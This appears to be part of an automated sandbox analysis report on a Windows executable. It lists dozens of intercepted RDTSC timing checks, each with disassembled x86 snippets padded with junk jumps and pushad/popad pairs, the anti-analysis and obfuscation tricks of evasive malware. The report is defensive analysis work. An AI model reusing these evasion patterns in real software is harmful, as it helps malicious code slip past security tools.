Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 1106C4F second address: 1106C67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a js 00007F8E2D690EF2h 0x00000010 jbe 00007F8E2D690EECh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 1108751 second address: 1108755 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 1108755 second address: 1108766 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jno 00007F8E2D690EE6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB0016 second address: 6DB0025 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D68FC5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB0114 second address: 6DB0169 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F8E2D690EF1h 0x0000000d xchg eax, ebx 0x0000000e jmp 00007F8E2D690EEEh 0x00000013 mov ebx, dword ptr [eax+10h] 0x00000016 jmp 00007F8E2D690EF0h 0x0000001b xchg eax, esi 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F8E2D690EF7h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB0169 second address: 6DB016F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB016F second address: 6DB0173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB0173 second address: 6DB0177 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB0177 second address: 6DB01FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F8E2D690EEEh 0x0000000e xchg eax, esi 0x0000000f jmp 00007F8E2D690EF0h 0x00000014 mov esi, dword ptr [762C06ECh] 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F8E2D690EEDh 0x00000021 or cx, 7616h 0x00000026 jmp 00007F8E2D690EF1h 0x0000002b popfd 0x0000002c popad 0x0000002d test esi, esi 0x0000002f pushad 0x00000030 mov bx, si 0x00000033 jmp 00007F8E2D690EF8h 0x00000038 popad 0x00000039 jne 00007F8E2D691CE5h 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 mov bx, C580h 0x00000046 mov edx, 6C68B9ACh 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB01FE second address: 6DB0249 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, dx 0x00000006 push edx 0x00000007 pop ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esp 0x0000000c pushad 0x0000000d movzx esi, di 0x00000010 popad 0x00000011 mov dword ptr [esp], edi 0x00000014 jmp 00007F8E2D68FC68h 0x00000019 call dword ptr [76290B60h] 0x0000001f mov eax, 75A0E5E0h 0x00000024 ret 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F8E2D68FC67h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB0249 second address: 6DB0270 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D690EF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 00000044h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov esi, edi 0x00000010 mov ch, dh 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB0270 second address: 6DB02B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D68FC61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov esi, edx 0x0000000f pushfd 0x00000010 jmp 00007F8E2D68FC5Fh 0x00000015 adc cl, FFFFFFDEh 0x00000018 jmp 00007F8E2D68FC69h 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB02B9 second address: 6DB0351 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D690EF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007F8E2D690EEEh 0x0000000f push eax 0x00000010 jmp 00007F8E2D690EEBh 0x00000015 xchg eax, edi 0x00000016 pushad 0x00000017 jmp 00007F8E2D690EF4h 0x0000001c jmp 00007F8E2D690EF2h 0x00000021 popad 0x00000022 push dword ptr [eax] 0x00000024 jmp 00007F8E2D690EF0h 0x00000029 mov eax, dword ptr fs:[00000030h] 0x0000002f pushad 0x00000030 mov eax, 5FD8049Dh 0x00000035 mov dl, al 0x00000037 popad 0x00000038 push dword ptr [eax+18h] 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F8E2D690EF7h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB0351 second address: 6DB0357 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB041D second address: 6DB0424 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB0424 second address: 6DB0433 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 sub eax, eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB0433 second address: 6DB0441 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D690EEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB0441 second address: 6DB04B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D68FC5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi], edi 0x0000000b pushad 0x0000000c call 00007F8E2D68FC64h 0x00000011 mov ebx, esi 0x00000013 pop eax 0x00000014 pushfd 0x00000015 jmp 00007F8E2D68FC67h 0x0000001a or ax, C8BEh 0x0000001f jmp 00007F8E2D68FC69h 0x00000024 popfd 0x00000025 popad 0x00000026 mov dword ptr [esi+04h], eax 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F8E2D68FC5Dh 0x00000030 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB04B4 second address: 6DB0565 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D690EF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+08h], eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F8E2D690EECh 0x00000013 jmp 00007F8E2D690EF5h 0x00000018 popfd 0x00000019 movzx eax, di 0x0000001c popad 0x0000001d mov dword ptr [esi+0Ch], eax 0x00000020 pushad 0x00000021 mov ecx, edi 0x00000023 mov ax, bx 0x00000026 popad 0x00000027 mov eax, dword ptr [ebx+4Ch] 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F8E2D690EEDh 0x00000031 xor cl, 00000066h 0x00000034 jmp 00007F8E2D690EF1h 0x00000039 popfd 0x0000003a mov cx, F897h 0x0000003e popad 0x0000003f mov dword ptr [esi+10h], eax 0x00000042 jmp 00007F8E2D690EEAh 0x00000047 mov eax, dword ptr [ebx+50h] 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d pushfd 0x0000004e jmp 00007F8E2D690EEDh 0x00000053 sub cl, 00000076h 0x00000056 jmp 00007F8E2D690EF1h 0x0000005b popfd 0x0000005c mov si, 0367h 0x00000060 popad 0x00000061 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB0565 second address: 6DB0594 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D68FC5Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+14h], eax 0x0000000c jmp 00007F8E2D68FC5Eh 0x00000011 mov eax, dword ptr [ebx+54h] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov di, 1CE0h 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB0594 second address: 6DB05BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8E2D690EF2h 0x00000009 add ax, FF28h 0x0000000e jmp 00007F8E2D690EEBh 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB05BD second address: 6DB05EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esi+18h], eax 0x0000000a jmp 00007F8E2D68FC64h 0x0000000f mov eax, dword ptr [ebx+58h] 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 call 00007F8E2D68FC5Ch 0x0000001a pop ecx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB05EE second address: 6DB05FF instructions: 0x00000000 rdtsc 0x00000002 movsx edi, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov dword ptr [esi+1Ch], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB05FF second address: 6DB0605 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB0605 second address: 6DB060B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB060B second address: 6DB062B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D68FC5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+5Ch] 0x0000000e pushad 0x0000000f mov bx, ax 0x00000012 push eax 0x00000013 push edx 0x00000014 mov edx, esi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB062B second address: 6DB0688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esi+20h], eax 0x00000008 pushad 0x00000009 jmp 00007F8E2D690EF5h 0x0000000e mov bx, ax 0x00000011 popad 0x00000012 mov eax, dword ptr [ebx+60h] 0x00000015 jmp 00007F8E2D690EEAh 0x0000001a mov dword ptr [esi+24h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F8E2D690EEDh 0x00000026 or si, BCC6h 0x0000002b jmp 00007F8E2D690EF1h 0x00000030 popfd 0x00000031 mov edx, eax 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB0688 second address: 6DB06A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8E2D68FC68h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB06A4 second address: 6DB06DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+64h] 0x0000000b pushad 0x0000000c mov bx, 5AB0h 0x00000010 mov ecx, edi 0x00000012 popad 0x00000013 mov dword ptr [esi+28h], eax 0x00000016 jmp 00007F8E2D690EEBh 0x0000001b mov eax, dword ptr [ebx+68h] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F8E2D690EF5h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB06DF second address: 6DB0706 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D68FC61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+2Ch], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8E2D68FC5Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB0706 second address: 6DB07A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D690EF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [ebx+6Ch] 0x0000000d pushad 0x0000000e mov esi, 077FA993h 0x00000013 pushfd 0x00000014 jmp 00007F8E2D690EF8h 0x00000019 or esi, 10C2DA18h 0x0000001f jmp 00007F8E2D690EEBh 0x00000024 popfd 0x00000025 popad 0x00000026 mov word ptr [esi+30h], ax 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007F8E2D690EEBh 0x00000033 or ch, FFFFFFDEh 0x00000036 jmp 00007F8E2D690EF9h 0x0000003b popfd 0x0000003c pushfd 0x0000003d jmp 00007F8E2D690EF0h 0x00000042 xor ch, FFFFFFD8h 0x00000045 jmp 00007F8E2D690EEBh 0x0000004a popfd 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB07A2 second address: 6DB07A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB07A8 second address: 6DB07AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB07AC second address: 6DB07E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ax, word ptr [ebx+00000088h] 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F8E2D68FC5Fh 0x00000018 jmp 00007F8E2D68FC63h 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB07E3 second address: 6DB086D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8E2D690EEFh 0x00000008 mov ebx, ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov word ptr [esi+32h], ax 0x00000011 pushad 0x00000012 mov cx, 9F47h 0x00000016 mov di, cx 0x00000019 popad 0x0000001a mov eax, dword ptr [ebx+0000008Ch] 0x00000020 pushad 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F8E2D690EF2h 0x00000028 jmp 00007F8E2D690EF5h 0x0000002d popfd 0x0000002e call 00007F8E2D690EF0h 0x00000033 pop esi 0x00000034 popad 0x00000035 mov edx, 3C054D46h 0x0000003a popad 0x0000003b mov dword ptr [esi+34h], eax 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F8E2D690EF8h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB086D second address: 6DB0884 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F8E2D68FC61h 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB0884 second address: 6DB08B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [ebx+18h] 0x0000000a jmp 00007F8E2D690EEDh 0x0000000f mov dword ptr [esi+38h], eax 0x00000012 jmp 00007F8E2D690EEEh 0x00000017 mov eax, dword ptr [ebx+1Ch] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB08B5 second address: 6DB08D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D68FC69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB08D2 second address: 6DB0941 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8E2D690EF7h 0x00000009 jmp 00007F8E2D690EF3h 0x0000000e popfd 0x0000000f jmp 00007F8E2D690EF8h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov dword ptr [esi+3Ch], eax 0x0000001a pushad 0x0000001b jmp 00007F8E2D690EEEh 0x00000020 push eax 0x00000021 push edx 0x00000022 call 00007F8E2D690EF0h 0x00000027 pop eax 0x00000028 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB0941 second address: 6DB095F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D68FC5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [ebx+20h] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov si, bx 0x00000013 mov bx, 9372h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB095F second address: 6DB0965 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB0965 second address: 6DB0969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB0969 second address: 6DB09D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D690EF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+40h], eax 0x0000000e jmp 00007F8E2D690EF0h 0x00000013 lea eax, dword ptr [ebx+00000080h] 0x00000019 pushad 0x0000001a mov eax, 09EDF3CDh 0x0000001f jmp 00007F8E2D690EEAh 0x00000024 popad 0x00000025 push 00000001h 0x00000027 pushad 0x00000028 mov dx, ax 0x0000002b popad 0x0000002c push eax 0x0000002d jmp 00007F8E2D690EF4h 0x00000032 mov dword ptr [esp], eax 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 mov eax, 4B43D763h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB09D2 second address: 6DB09EE instructions: 0x00000000 rdtsc 0x00000002 mov edx, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 call 00007F8E2D68FC64h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB09EE second address: 6DB0A03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 lea eax, dword ptr [ebp-10h] 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8E2D690EEAh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB0A03 second address: 6DB0A3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 mov ebx, 6D9A16F0h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push esp 0x0000000e jmp 00007F8E2D68FC64h 0x00000013 mov dword ptr [esp], eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jmp 00007F8E2D68FC5Dh 0x0000001e mov esi, 7525BF67h 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB0A3E second address: 6DB0A44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB0A44 second address: 6DB0A48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB0A7C second address: 6DB0A80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB0A80 second address: 6DB0A86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB0A86 second address: 6DB0AF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D690EF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F8E9CB1FB0Bh 0x0000000f pushad 0x00000010 mov ah, 4Fh 0x00000012 popad 0x00000013 mov eax, dword ptr [ebp-0Ch] 0x00000016 pushad 0x00000017 mov si, dx 0x0000001a popad 0x0000001b mov dword ptr [esi+04h], eax 0x0000001e jmp 00007F8E2D690EF9h 0x00000023 lea eax, dword ptr [ebx+78h] 0x00000026 jmp 00007F8E2D690EEEh 0x0000002b push 00000001h 0x0000002d jmp 00007F8E2D690EF0h 0x00000032 nop 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 mov ecx, edx 0x00000038 push edi 0x00000039 pop eax 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB0AF8 second address: 6DB0B46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8E2D68FC60h 0x00000008 mov ebx, esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007F8E2D68FC67h 0x00000013 nop 0x00000014 jmp 00007F8E2D68FC66h 0x00000019 lea eax, dword ptr [ebp-08h] 0x0000001c pushad 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB0B46 second address: 6DB0B83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 nop 0x00000007 jmp 00007F8E2D690EF2h 0x0000000c push eax 0x0000000d jmp 00007F8E2D690EEBh 0x00000012 nop 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F8E2D690EF5h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB0B83 second address: 6DB0B89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB0BA9 second address: 6DB0BF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 movsx edx, cx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov edi, eax 0x0000000e jmp 00007F8E2D690EF4h 0x00000013 test edi, edi 0x00000015 pushad 0x00000016 call 00007F8E2D690EEEh 0x0000001b pop eax 0x0000001c pushad 0x0000001d mov si, dx 0x00000020 mov edi, 61D5032Ch 0x00000025 popad 0x00000026 popad 0x00000027 js 00007F8E9CB1F9B7h 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 mov edx, eax 0x00000032 mov dl, ah 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB0BF6 second address: 6DB0C0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8E2D68FC61h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB0C0B second address: 6DB0CEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebp-04h] 0x0000000b jmp 00007F8E2D690EEDh 0x00000010 mov dword ptr [esi+08h], eax 0x00000013 pushad 0x00000014 mov ecx, 17DB0143h 0x00000019 call 00007F8E2D690EF8h 0x0000001e pop ebx 0x0000001f popad 0x00000020 lea eax, dword ptr [ebx+70h] 0x00000023 jmp 00007F8E2D690EECh 0x00000028 push 00000001h 0x0000002a jmp 00007F8E2D690EF0h 0x0000002f nop 0x00000030 jmp 00007F8E2D690EF0h 0x00000035 push eax 0x00000036 jmp 00007F8E2D690EEBh 0x0000003b nop 0x0000003c pushad 0x0000003d push esi 0x0000003e pushfd 0x0000003f jmp 00007F8E2D690EEBh 0x00000044 sbb al, 0000005Eh 0x00000047 jmp 00007F8E2D690EF9h 0x0000004c popfd 0x0000004d pop esi 0x0000004e push eax 0x0000004f push edx 0x00000050 pushfd 0x00000051 jmp 00007F8E2D690EF7h 0x00000056 and si, 8A6Eh 0x0000005b jmp 00007F8E2D690EF9h 0x00000060 popfd 0x00000061 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB0CEA second address: 6DB0CFB instructions: 0x00000000 rdtsc 0x00000002 mov dx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 lea eax, dword ptr [ebp-18h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB0CFB second address: 6DB0CFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB0CFF second address: 6DB0D0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D68FC5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
